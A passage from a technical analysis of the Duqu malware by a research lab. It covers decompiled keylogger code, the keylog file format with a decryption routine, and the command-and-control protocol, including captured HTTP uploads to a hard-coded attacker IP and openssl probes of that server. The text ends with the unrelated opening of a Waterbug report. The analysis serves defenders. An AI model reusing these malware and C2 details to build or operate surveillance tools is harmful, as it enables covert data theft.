Sample 19 – Keylogger – does not start if the first parameter is not “xxx”
v4 = *(_DWORD *)(a3 + 4 * *(_DWORD *)a1);
if ( *(_WORD *)v4 == 47 )
{
v6 = (const WCHAR *)(v4 + 2);
++*(_DWORD *)a1;
if ( lstrcmpiW(v6, L"delme") )
{
if ( lstrcmpiW(v6, L"v") )
{
if ( lstrcmpiW(v6, L"quit") )
{
if ( lstrcmpiW(v6, L"restart") )
{
result = sub_401000(a3, a1, a4, v6, a2);
}
else
{
result = 1;
*(_DWORD *)(a4 + 12) = 1;
}
}
Sample 20 – valid options – not tested furthermore
34 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab.
signed int __userpurge sub_401000<eax>(int a1<edx>, int a2<ecx>, int a3<ebx>, LPCWSTR lpString1, int a5)
{
int v5; // eax@1
int v7; // edi@3
v5 = *(_DWORD *)a2;
if ( *(_DWORD *)a2 >= a5 )
return 0;
v7 = *(_DWORD *)(a1 + 4 * v5);
*(_DWORD *)a2 = v5 + 1;
if ( !lstrcmpW(lpString1, L"in") )
{
*(_DWORD *)(a3 + 16) = v7;
return 1;
}
if ( !lstrcmpW(lpString1, L"out") )
{
*(_DWORD *)(a3 + 32) = v7;
return 1;
}
return 0;
}
Sample 21 – and some more options
The keylogger.exe file contains an embedded jpeg file from position 34440 (in bytes). The
picture is only partial, the readable text shows “Interacting Galaxy System NGC 6745”, most
likely a picture taken from NASA and used as deception. At position 42632 an encrypted DLL
can be found. The encryption is simple XOR with 0xFF.
The unencrypted DLL is (as in the other cases) a compressed UPX file. According to the call
graph, most likely, the “outer” .exe is just a control program and injector to this internal
part, and the internal DLL contains keylogging related function calls.
Figure 12 – Structure of the interal DLL of keylogger shows wide functionality
35 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab. Interesting function calls: GetIPForwardTable, GetIpNetTable, GetWindowTextW,
CreateCompatiblebitmap, GetKeyState, NetfileEnum, etc.
12.1.1. Keylogger file format
The keylogger stores data in the %TEMP% directory of the target computer. The file begins
with hex AD 34 00 and generally resides in the User/… /Appdata/Local/Temp OR Documents
and Settings/ …/Local data/temp directory.
Strings “AEh91AY” in the file are modified bzip headers, whose parts can be decompressed
after extracting and modifying it back to “BZh91AY”. Note that the magic number, AE
appears again in the code.
Another type of this binary file begins with ”ABh91AY”, which is a bzip2 compressed file
containing a number of files in cleartext, like a tar file (but simpler format). The
uncompressed file begins with string “ABSZ” and the name of the source computer.
36 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab. The keylogger file is a variable‐size record based format and it begins with 0xAD 0x34.
typedef struct tagDQH1 {
unsigned char magic;
unsigned char type;
unsigned char unk1;
unsigned char unk2;
time_t ts;
unsigned long len;
} DQH1;
typedef struct tagDQHC0 {
unsigned long lenu;
unsigned char zipm[8];
} DQHC0;
Sample 22 – header structures for keylog file
At the beginning of each block, the file contains a tagDQH1 structure, where magic=0xAD.
This is valid for the beginning of the file (offset=0) as well.
If the next block is compressed (that is if the zipm (“zip magic”) part begins with
“AEh91AY&SY” meaning that this part is a bzip2 compressed part), then tagDQHC0 block
follows, where lenu contains the length of the compressed part.
If the “zip magic” is missing, then the block is in a different format and the tagDQH1
information can be used for length information.
Otherwise, the block of the keylog file are XOR encrypted which can be decrypted by the
following routine:
for(i=offset-1;i > 0;i--) {
xb[i]^=xb[i-1];
}
xb[0]^=0xA2;
Sample 23 – XOR decrypter for keylogger log files
The contents of the parts can be different: Information on the disk drives, network shares,
TCP table, information on running processes, names of the active window on the screen,
screenshots in bitmap, etc.
37 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab. 12.2. Communication module
The discovered Duqu payload contains a Command and Control, or more precisely a
backdoor covert channel control communication module. (It’s goal is most likely not just
simple telling “commands”, but rather like RDP or VNC like functionality extended with proxy
functions and file transfer or such, but this is partly just speculation.)
In our case the communication is done with 206.183.111.97 , which is up and running for
months and still running at the time of writing this document. The communication protocol
uses both HTTP port 80, and HTTPS port 443. We present a first analysis with initial samples,
but further investigations are required to fully understand the communication protocol.
12.2.1. Communication protocol
For port 443, binary traffic can be observed. Among the first bytes of the traffic, we see the
characters “SH” most of the time, for both sides, and multiple times the observed string is
“53 48 b8 50 57” (SH<b8>PW).
For port 80, the traffic shows a distinct form. First, the victim computer starts the
communication in the following form:
GET / HTTP/1.1
Cookie: PHPSESSID=gsc46y0u9mok0g27ji11jj1w22
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.9)
Gecko/20100824 Firefox/3.6.9 (.NET CLR 3.5.30729)
Host: 206.183.111.97
Connection: Keep-Alive
Sample 24 – HTTP communication protocol HTTP query header
The PHP session ID is of course fabricated and generated by the communication module. The
User Agent is static and as it is very specific (rarely observed in the wild), providing a
possibility to create specific matching signature e.g. in IDS tools.
The IP address seems to be constant, and it is hard coded to the PNF file in multiple times
(once as a UTF‐8 IP string, and twice as hex binaries).
After sending out the HTTP header, the server begins the answer by sending back a jpeg file
(seems to be a 100x100 empty jpeg), most likely for deception and to avoid firewall
problems:
00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d HTTP/1.1 200 OK.
00000010 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 .Content -Type: i
00000020 6d 61 67 65 2f 6a 70 65 67 0d 0a 54 72 61 6e 73 mage/jpe g..Trans
38 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab. 00000030 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 fer-Enco ding: ch
00000040 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f unked..C onnectio
00000050 6e 3a 20 43 6c 6f 73 65 0d 0a 0d 0a n: Close ....
0000005C 32 45 30 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 2E0..... ...JFIF.
0000006C 01 01 01 00 60 00 60 00 00 ff db 00 43 00 02 01 ....`.`. ....C...
0000007C 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 ........ ........
0000008C 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 ........ ........
0000009C 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c ........ ........
000000AC 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db ........ ........
000000BC 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 .C...... ........
000000CC 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ........ ........
000000DC 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ........ ........
000000EC 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ........ ........
000000FC 0c 0c 0c ff c0 00 11 08 00 36 00 36 03 01 22 00 ........ .6.6..".
0000010C 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 ........ ........
0000011C 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 ........ ........
0000012C 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 ........ ........
0000013C 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 ........ ...}....
0000014C 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 ....!1A. .Qa."q.2
0000015C 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 ....#B.. .R..$3br
0000016C 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 ........ %&'()*45
0000017C 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 6789:CDE FGHIJSTU
0000018C 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 VWXYZcde fghijstu
0000019C 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 vwxyz... ........
000001AC 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 ........ ........
000001BC b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ........ ........
000001CC ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 ........ ........
000001DC e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa ff c4 ........ ........
000001EC 00 1f 01 00 03 01 01 01 01 01 01 01 01 01 00 00 ........ ........
000001FC 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff ........ ........
0000020C c4 00 b5 11 00 02 01 02 04 04 03 04 07 05 04 04 ........ ........
0000021C 00 01 02 77 00 01 02 03 11 04 05 21 31 06 12 41 ...w.... ...!1..A
0000022C 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 Q.aq."2. ..B.....
0000023C 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 #3R..br. ..$4.%..
0000024C 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 ...&'()* 56789:CD
0000025C 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 EFGHIJST UVWXYZcd
0000026C 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 efghijst uvwxyz..
0000027C 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a ........ ........
0000028C a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 ........ ........
0000029C b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 ........ ........
000002AC d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 ........ ........
000002BC f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 ........ ........
000002CC 11 00 3f 00 fd fc a2 8a 28 00 a2 8a 28 00 a2 8a ..?..... (...(...
000002DC 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a (...(... (...(...
000002EC 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a (...(... (...(...
000002FC 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a (...(... (...(...
0000030C 28 00 a2 8a 28 03 ff d9 53 48 c0 a7 26 7b 00 22 (...(... SH..&{."
0000031C 00 01 00 00 14 10 00 00 00 01 00 00 00 3e 96 19 ........ .....>..
0000032C 10 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 .... ... ........
Sample 25 – beginning of the transmission from the C&C server – a JPEG + extras
39 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab. Sometimes the client sends a JPEG image in the query as well, which is always named as
DSC00001.jpg (hard coded in the binary) as follows in the sample below.
POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=---------------------------77eb5cc2cc0add
Cookie: PHPSESSID=<some id removed here>
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9 (.NET
CLR 3.5.30729)
Content-Length: 891
Host: 206.183.111.97
---------------------------<some id>
Content-Disposition: form-data; name="DSC00001.jpg"
Content-Type: image/jpeg
......JFIF.....`.`.....C.........................................
...
.........
.........C.......................................................................6.6.."....................
..................
.....................}........!1A..Qa."q.2....#B...R..$3br..
.....%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.........................................................
...............................................
.....................w.......!1..AQ.aq."2...B.....#3R..br.
.$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwx
Sample 26 – beginning of the transmission with JPEG upload
The communication can be reproduced in telnet. In this case, it can be clearly seen that after
sending back the JPEG, the other end starts to send out some binary data, and because it
remains unanswered, the other end closes down the channel. We illustrate this emulation in
the following sample log.
…
000002CC 11 00 3f 00 fd fc a2 8a 28 00 a2 8a 28 00 a2 8a ..?..... (...(...
000002DC 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a (...(... (...(...
000002EC 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a (...(... (...(...
000002FC 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a (...(... (...(...
0000030C 28 00 a2 8a 28 03 ff d9 53 48 c0 a7 26 7b 00 22 (...(... SH..&{."
0000031C 00 01 00 00 14 10 00 00 00 01 00 00 00 3e 96 19 ........ .....>..
0000032C 10 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 .... ... ........
0000033C 00 02 00 00 00 0d 0a .......
00000343 31 31 0d 0a 0c 00 00 00 00 02 00 00 00 3e 96 19 11...... .....>..
00000353 00 00 00 00 20 0d 0a .... ..
0000035A 32 31 0d 0a 14 10 00 00 00 01 00 00 00 3e 96 19 21...... .....>..
0000036A 10 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 .... ... ........
0000037A 00 02 00 00 00 0d 0a .......
00000381 31 31 0d 0a 0c 00 00 00 00 02 00 00 00 3e 96 19 11...... .....>..
00000391 00 00 00 00 20 0d 0a .... ..
00000398 32 31 0d 0a 14 10 00 00 00 01 00 00 00 3e 96 19 21...... .....>..
000003A8 10 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 .... ... ........
000003B8 00 02 00 00 00 0d 0a .......
000003BF 31 31 0d 0a 0c 00 00 00 00 02 00 00 00 3e 96 19 11...... .....>..
000003CF 00 00 00 00 20 0d 0a .... ..
000003D6 32 31 0d 0a 14 10 00 00 00 01 00 00 00 3e 96 19 21...... .....>..
000003E6 10 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 .... ... ........
000003F6 00 02 00 00 00 0d 0a .......
000003FD 31 31 0d 0a 0c 00 00 00 00 02 00 00 00 3e 96 19 11...... .....>..
0000040D 00 00 00 00 20 0d 0a .... ..
00000414 32 31 0d 0a 14 10 00 00 00 01 00 00 00 3e 96 19 21...... .....>..
00000424 10 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 .... ... ........
00000434 00 02 00 00 00 0d 0a .......
40 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab.
Sample 27 – continuation of the traffic without proper client in multiple packets
12.2.2. Information on the SSL connection
We don’t know too much about the traffic on SSL port yet, but it seems that both parties use
self‐signed certificates. It is possible, however, to connect to the server without client
certificate. The server certificate has been changed over the time, most likely it is auto‐
regenerated in specific intervals.
$ openssl s_client -host 206.183.111.97 -port 443 -msg
CONNECTED(00000003)
>>> SSL 2.0 [length 0077], CLIENT-HELLO
01 03 01 00 4e 00 00 00 20 00 00 39 00 00 38 00
00 35 00 00 16 00 00 13 00 00 0a 07 00 c0 00 00
33 00 00 32 00 00 2f 03 00 80 00 00 05 00 00 04
01 00 80 00 00 15 00 00 12 00 00 09 06 00 40 00
00 14 00 00 11 00 00 08 00 00 06 04 00 80 00 00
03 02 00 80 00 00 ff d2 f0 15 f8 da cb cb ce e8
c9 eb 60 23 34 93 98 c5 72 8b 22 c9 9f b8 1d e4
96 23 4e 88 08 5e 2c
19605:error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure:s23_lib.c:188:
[SSL2 is not supported]
$ openssl s_client -host 206.183.111.97 -port 443 -msg -tls1
CONNECTED(00000003)
>>> TLS 1.0 Handshake [length 005a], ClientHello
01 00 00 56 03 01 4e 91 da 29 e3 8b 9e 68 2f 4f
0d a8 30 ee 1c d5 fc dc cb f9 ae 33 6a 6f cb ff
80 6d 2a 34 5c 88 00 00 28 00 39 00 38 00 35 00
16 00 13 00 0a 00 33 00 32 00 2f 00 05 00 04 00
15 00 12 00 09 00 14 00 11 00 08 00 06 00 03 00
ff 02 01 00 00 04 00 23 00 00
<<< TLS 1.0 Handshake [length 004a], ServerHello
02 00 00 46 03 01 4e 92 48 ab 35 d9 05 8d 47 9a
8e 0c 4f fd b3 64 bb 18 f5 74 2a a1 36 45 08 cd
e1 b7 5f d0 a2 37 20 90 1e 00 00 fb f7 cf 4e f0
6d 26 95 ec 69 68 fa e7 1b ca 84 1f 0b 4f fd 2c
b0 69 90 01 a8 a3 0e 00 2f 00
<<< TLS 1.0 Handshake [length 0125], Certificate
0b 00 01 21 00 01 1e 00 01 1b 30 82 01 17 30 81
c2 a0 03 02 01 02 02 10 40 2b 57 d9 61 5a c5 b8
40 a1 04 19 e6 c0 c9 d5 30 0d 06 09 2a 86 48 86
f7 0d 01 01 05 05 00 30 0d 31 0b 30 09 06 03 55
04 03 1e 02 00 2a 30 1e 17 0d 31 30 30 31 30 31
31 36 30 30 30 30 5a 17 0d 32 30 30 31 30 31 31
36 30 30 30 30 5a 30 0d 31 0b 30 09 06 03 55 04
03 1e 02 00 2a 30 5c 30 0d 06 09 2a 86 48 86 f7
0d 01 01 01 05 00 03 4b 00 30 48 02 41 00 d1 da
d2 94 78 ee a2 56 96 88 14 d0 38 49 36 9e 0f 1b
17 71 42 7a 32 01 42 b4 17 3e 40 87 cb c1 bd 94
62 f6 f8 f9 42 53 34 78 a9 f9 01 50 8f 39 f0 2c
f4 36 dd 24 74 26 86 79 11 38 94 78 81 35 02 03
01 00 01 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05
05 00 03 41 00 5c a4 39 a8 45 98 2a a9 97 05 77
63 2b 31 d7 96 bc b4 9f 0a dd bd 25 e4 1f dd e1
be c4 3c 08 56 31 6a 3d 23 f5 dc b1 5a 78 fe 34
a6 c5 91 d0 92 f6 28 f4 d9 61 eb 1a 5a 98 44 2a
a9 30 a2 46 e3
depth=0 /CN=\x00*
verify error:num=18:self signed certificate
verify return:1
depth=0 /CN=\x00*
verify return:1
<<< TLS 1.0 Handshake [length 0004], ServerHelloDone
0e 00 00 00
41 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab. >>> TLS 1.0 Handshake [length 0046], ClientKeyExchange
10 00 00 42 00 40 a0 a3 36 08 e6 3d 25 b0 93 06
62 15 9d 3f ad b3 9c 9b e3 ee 87 23 37 e6 d2 8a
9e d0 0f af 1d fa 04 7e 66 e8 79 c5 71 3d 13 39
eb 7b 13 17 7c 91 e1 16 14 44 59 57 df df 69 50
bc 47 32 1b 87 35
>>> TLS 1.0 ChangeCipherSpec [length 0001]
01
>>> TLS 1.0 Handshake [length 0010], Finished
14 00 00 0c 1e e5 b8 c5 25 ef 03 8a 11 6f e3 c4
<<< TLS 1.0 ChangeCipherSpec [length 0001]
01
<<< TLS 1.0 Handshake [length 0010], Finished
14 00 00 0c 46 e2 18 8a 4e 09 3d 41 45 26 c6 ba
---
Certificate chain
0 s:/CN=\x00*
i:/CN=\x00*
---
Server certificate
-----BEGIN CERTIFICATE-----
MIIBFzCBwqADAgECAhBAK1fZYVrFuEChBBnmwMnVMA0GCSqGSIb3DQEBBQUAMA0x
CzAJBgNVBAMeAgAqMB4XDTEwMDEwMTE2MDAwMFoXDTIwMDEwMTE2MDAwMFowDTEL
MAkGA1UEAx4CACowXDANBgkqhkiG9w0BAQEFAANLADBIAkEA0drSlHjuolaWiBTQ
OEk2ng8bF3FCejIBQrQXPkCHy8G9lGL2+PlCUzR4qfkBUI858Cz0Nt0kdCaGeRE4
lHiBNQIDAQABMA0GCSqGSIb3DQEBBQUAA0EAXKQ5qEWYKqmXBXdjKzHXlry0nwrd
vSXkH93hvsQ8CFYxaj0j9dyxWnj+NKbFkdCS9ij02WHrGlqYRCqpMKJG4w==
-----END CERTIFICATE-----
subject=/CN=\x00*
issuer=/CN=\x00*
---
No client certificate CA names sent
---
SSL handshake has read 435 bytes and written 229 bytes
---
New, TLSv1/SSLv3, Cipher is AES128-SHA
Server public key is 512 bit
Secure Renegotiation IS NOT supported
Compression: NONE
Expansion: NONE
SSL-Session:
Protocol : TLSv1
Cipher : AES128-SHA
Session-ID: 901E0000FBF7CF4EF06D2695EC6968FAE71BCA841F0B4FFD2CB0699001A8A30E
Session-ID-ctx:
Master-Key:
CBE2283F0192B1E928DDA4E21471BA27655EBB626EC807FBE80CA284AE8BC68AFD49349750EBF7010896B1BD04050D18
Key-Arg : None
Start Time: 1318181417
Timeout : 7200 (sec)
Verify return code: 18 (self signed certificate)
---
Sample 28 – TLS communication with the C&C server
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
40:2b:57:d9:61:5a:c5:b8:40:a1:04:19:e6:c0:c9:d5
Signature Algorithm: sha1WithRSAEncryption
Issuer: CN=\x00*
Validity
Not Before: Jan 1 16:00:00 2010 GMT
Not After : Jan 1 16:00:00 2020 GMT
Subject: CN=\x00*
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public Key: (512 bit)
Modulus (512 bit):
00:d1:da:d2:94:78:ee:a2:56:96:88:14:d0:38:49:
42 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab. 36:9e:0f:1b:17:71:42:7a:32:01:42:b4:17:3e:40:
87:cb:c1:bd:94:62:f6:f8:f9:42:53:34:78:a9:f9:
01:50:8f:39:f0:2c:f4:36:dd:24:74:26:86:79:11:
38:94:78:81:35
Exponent: 65537 (0x10001)
Signature Algorithm: sha1WithRSAEncryption
5c:a4:39:a8:45:98:2a:a9:97:05:77:63:2b:31:d7:96:bc:b4:
9f:0a:dd:bd:25:e4:1f:dd:e1:be:c4:3c:08:56:31:6a:3d:23:
f5:dc:b1:5a:78:fe:34:a6:c5:91:d0:92:f6:28:f4:d9:61:eb:
1a:5a:98:44:2a:a9:30:a2:46:e3
Sample 29 – Server certificate details
$ openssl s_client -host 206.183.111.97 -port 443 -msg -ssl3
CONNECTED(00000003)
>>> SSL 3.0 Handshake [length 0054], ClientHello
01 00 00 50 03 00 4e 91 da d9 df fe e2 42 d8 bb
6a 96 54 35 88 d3 75 87 cb a2 80 6c 83 22 32 c6
00 b5 53 c5 30 bb 00 00 28 00 39 00 38 00 35 00
16 00 13 00 0a 00 33 00 32 00 2f 00 05 00 04 00
15 00 12 00 09 00 14 00 11 00 08 00 06 00 03 00
ff 02 01 00
<<< SSL 3.0 Handshake [length 004a], ServerHello
02 00 00 46 03 00 4e 92 49 5c cc e0 3b 46 4a 34
72 e2 51 e6 05 29 4e 13 c4 6f 58 66 bc 3d ab cd
d9 5a eb 24 a1 32 20 60 0e 00 00 99 82 81 bb 47
ab fc 23 79 06 07 7f 11 6f 0a fd b0 9a 56 03 ab
78 2e 6e 13 09 9e e5 00 05 00
<<< SSL 3.0 Handshake [length 0125], Certificate
0b 00 01 21 00 01 1e 00 01 1b 30 82 01 17 30 81
c2 a0 03 02 01 02 02 10 4e f6 48 35 85 40 75 ac
47 41 32 d4 dc e9 d0 9c 30 0d 06 09 2a 86 48 86
f7 0d 01 01 05 05 00 30 0d 31 0b 30 09 06 03 55
04 03 1e 02 00 2a 30 1e 17 0d 31 30 30 31 30 31
31 36 30 30 30 30 5a 17 0d 32 30 30 31 30 31 31
36 30 30 30 30 5a 30 0d 31 0b 30 09 06 03 55 04
03 1e 02 00 2a 30 5c 30 0d 06 09 2a 86 48 86 f7
0d 01 01 01 05 00 03 4b 00 30 48 02 41 00 d1 da
d2 94 78 ee a2 56 96 88 14 d0 38 49 36 9e 0f 1b
17 71 42 7a 32 01 42 b4 17 3e 40 87 cb c1 bd 94
62 f6 f8 f9 42 53 34 78 a9 f9 01 50 8f 39 f0 2c
f4 36 dd 24 74 26 86 79 11 38 94 78 81 35 02 03
01 00 01 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05
05 00 03 41 00 7a 26 43 86 75 49 c2 15 4e ed 5b
cd ed ae 24 06 56 f2 04 dd 77 b2 e1 48 05 4e 9f
2f a8 be 38 71 49 c9 0d b6 a0 ec 77 ea e4 a3 8c
ed 0b b7 7c 36 a5 71 0f d8 57 c3 94 17 dd f7 ea
65 0d 7c 79 66
depth=0 /CN=\x00*
verify error:num=18:self signed certificate
verify return:1
depth=0 /CN=\x00*
verify return:1
<<< SSL 3.0 Handshake [length 0004], ServerHelloDone
0e 00 00 00
>>> SSL 3.0 Handshake [length 0044], ClientKeyExchange
10 00 00 40 96 85 20 da bd 3c ea 13 d8 7d b3 86
6e 7c 9e 86 76 53 dc 59 ae 47 e8 67 99 23 68 8a
35 aa 3f 77 13 3f b0 78 a1 64 d5 fc f6 11 93 b9
0e 49 06 7f a1 bf 24 bf ab 8b 3b 5a 35 3c 69 ba
e5 22 f7 5a
>>> SSL 3.0 ChangeCipherSpec [length 0001]
01
>>> SSL 3.0 Handshake [length 0028], Finished
14 00 00 24 5a 1d d0 06 ad 66 19 5d 46 a9 f0 03
61 3a a1 0d e9 56 8a 19 c5 7e 91 11 80 db 6a 42
b2 18 14 98 2b fd b6 48
<<< SSL 3.0 ChangeCipherSpec [length 0001]
01
<<< SSL 3.0 Handshake [length 0028], Finished
14 00 00 24 d3 40 5a ec b8 26 6d d5 10 7d 58 17
29 83 ca b9 8c 31 3e 80 54 4d 12 ba 7e bc 8b b1
68 ab 47 04 d2 b9 67 ca
---
43 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab. Certificate chain
0 s:/CN=\x00*
i:/CN=\x00*
---
Server certificate
-----BEGIN CERTIFICATE-----
MIIBFzCBwqADAgECAhBO9kg1hUB1rEdBMtTc6dCcMA0GCSqGSIb3DQEBBQUAMA0x
CzAJBgNVBAMeAgAqMB4XDTEwMDEwMTE2MDAwMFoXDTIwMDEwMTE2MDAwMFowDTEL
MAkGA1UEAx4CACowXDANBgkqhkiG9w0BAQEFAANLADBIAkEA0drSlHjuolaWiBTQ
OEk2ng8bF3FCejIBQrQXPkCHy8G9lGL2+PlCUzR4qfkBUI858Cz0Nt0kdCaGeRE4
lHiBNQIDAQABMA0GCSqGSIb3DQEBBQUAA0EAeiZDhnVJwhVO7VvN7a4kBlbyBN13
suFIBU6fL6i+OHFJyQ22oOx36uSjjO0Lt3w2pXEP2FfDlBfd9+plDXx5Zg==
-----END CERTIFICATE-----
subject=/CN=\x00*
issuer=/CN=\x00*
---
No client certificate CA names sent
---
SSL handshake has read 447 bytes and written 233 bytes
---
New, TLSv1/SSLv3, Cipher is RC4-SHA
Server public key is 512 bit
Secure Renegotiation IS NOT supported
Compression: NONE
Expansion: NONE
SSL-Session:
Protocol : SSLv3
Cipher : RC4-SHA
Session-ID: 600E0000998281BB47ABFC237906077F116F0AFDB09A5603AB782E6E13099EE5
Session-ID-ctx:
Master-Key:
73917F3FEF0B57C67098302F43162B977F4E8A16846C75A051B0623104FCDD0270F97B3F78A30D9ADACBD0CA190BA3CA
Key-Arg : None
Start Time: 1318181593
Timeout : 7200 (sec)
Verify return code: 18 (self signed certificate)
Sample 30 – Another handshake with SSLv3 (server certificate remains the same)
13. Relations to other papers
Some papers including [SymantecDossier] identified 0x19790509 as an important magic string
used in Stuxnet. However, they don’t mention the magic string 0xAE790509 found in the
beginning of the Stuxnet configuration file (and Duqu as well). The two numbers only differ
in the first character. In the code below, there is another magic string 0xAE1979DD copied from
Stuxnet DLL dropper. This seems to be interesting.
The other interesting magic is 0xAE. In Duqu, 0xAE comes up at many different places, so does for
Stuxnet. As described above, it’s part of the magic in the config file, and both Duqu and Stuxnet uses
0xAE240682 for configuration file encryption. For Stuxnet, some payload is encrypted with
0x01AE0000 and 0x02AE0000. The bzip2 encoded parts of the keylogger log file have a
magic “AEh91AY “BZh91AY…”, so again AE is the magic modification (note, however, that
some other affected bzip2 compressed files begin with “ABh91AY”) The question is, if Duqu
just reuses parts of the Stuxnet code and the author does not closely relates to the Stuxnet
authors, why both use 0xAE so often?
100016BA E86B090000 call SUB_L1000202A
100016BF 83C40C add esp,0000000Ch
100016C2 8D4580 lea eax,[ebp-80h]
44 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab. 100016C5 35DD7919AE xor eax,AE1979DDh
100016CA 33C9 xor ecx,ecx
100016CC 894580 mov [ebp-80h],eax
100016CF 894D84 mov [ebp-7Ch],ecx
100016D2 8B4508 mov eax,[ebp+08h]
100016D5 8B4008 mov eax,[eax+08h]
100016D8 051A1F0010 add eax,L10001F1A
Sample 31 – Some AE magic number from Stuxnet payload DLL
.text:10002534 loc_10002534: ; CODE XREF: general_handler_1000244C+EAj
.text:10002534 xor eax, eax
.text:10002536 jnz short loc_10002534
.text:10002538
.text:10002538 loc_10002538: ; CODE XREF: general_handler_1000244C+37j
.text:10002538 mov eax, [ebp+arg_0]
.text:1000253B xor eax, 0AE1979DDh
.text:10002540 xor ecx, ecx
.text:10002542 mov edx, [ebp+arg_0]
.text:10002545 mov [edx], eax
.text:10002547 mov [edx+4], ecx
.text:1000254A xor eax, eax
.text:1000254C
.text:1000254C loc_1000254C: ; CODE XREF: general_handler_1000244C+1Ej
.text:1000254C ; general_handler_1000244C+D5j
.text:1000254C pop esi
.text:1000254D leave
.text:1000254E retn
.text:1000254E general_handler_1000244C endp
Sample 32 – Duqu payload Res302 magic string at general handler
14. Unanswered questions
Our goal was to make an initial analysis that raises attention to this case of targeted
malware. As we are in academia, we have limited resources to analyze malware behavior.
That means we leave several questions for further investigation. We collected some of these
questions to inspire others:
• Is there any exploit, especially 0‐day in Duqu?
• How does Duqu infect computers?
• What are the differences in the RPC functions of Duqu and Stuxnet. And between
jminet and cmi4432?
• How is the netp191.pnf 0x9200 .zdata section compressed, and what is it’s goal? Is it
a copy of the DLL 302 resource itself?
• What is the reason for having the two separate types: jminet and cmi4432?
• What is the exact communication protocol for the covert channel? Where is TLS?
What’s inside? When does it generate self‐signed cert? How does it check remote
cert?
45 The content on this page has not been written by Symantec,
but has been provided courtesy of a third‐party research lab.
|
SECURITY RESPONSE
Waterbug uses highly-targeted spear-phishing and
watering-hole attack campaigns to target victims.The Waterbug attack group
Security Response
Version 1.02 – January 14, 2016The Waterbug attack groupCONTENTS
OVERVIEW ..................................................................... 3
Introduction .................................................................. 5
Vectors .......................................................................... 5
